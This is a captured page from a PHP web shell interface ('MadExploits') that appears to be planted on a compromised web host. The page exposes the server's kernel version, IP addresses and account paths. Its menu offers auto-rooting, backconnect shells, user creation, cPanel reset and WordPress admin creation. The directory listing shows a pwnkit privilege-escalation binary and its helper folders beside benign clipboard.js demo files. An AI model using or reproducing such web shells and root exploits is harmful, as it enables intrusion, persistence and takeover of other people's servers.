Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.139.80.172
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
micro /
assets /
clip /
demo /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
constructor-node.html
966
B
-rw-r--r--
constructor-nodelist.html
1.03
KB
-rw-r--r--
constructor-selector.html
1.01
KB
-rw-r--r--
function-target.html
975
B
-rw-r--r--
function-text.html
941
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
target-div.html
962
B
-rw-r--r--
target-input-number.html
895
B
-rw-r--r--
target-input.html
890
B
-rw-r--r--
target-programmatic-copy.html
724
B
-rw-r--r--
target-programmatic-cut.html
712
B
-rw-r--r--
target-textarea.html
985
B
-rw-r--r--
text-programmatic-copy.html
657
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : constructor-nodelist.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>constructor-nodelist</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> </head> <body> <!-- 1. Define some markup --> <button data-clipboard-text="1">Copy</button> <button data-clipboard-text="2">Copy</button> <button data-clipboard-text="3">Copy</button> <!-- 2. Include library --> <script src="../dist/clipboard.min.js"></script> <!-- 3. Instantiate clipboard by passing a list of HTML elements --> <script> var btns = document.querySelectorAll('button'); var clipboard = new ClipboardJS(btns); clipboard.on('success', function (e) { console.info('Action:', e.action); console.info('Text:', e.text); console.info('Trigger:', e.trigger); }); clipboard.on('error', function (e) { console.info('Action:', e.action); console.info('Text:', e.text); console.info('Trigger:', e.trigger); }); </script> </body> </html>
Close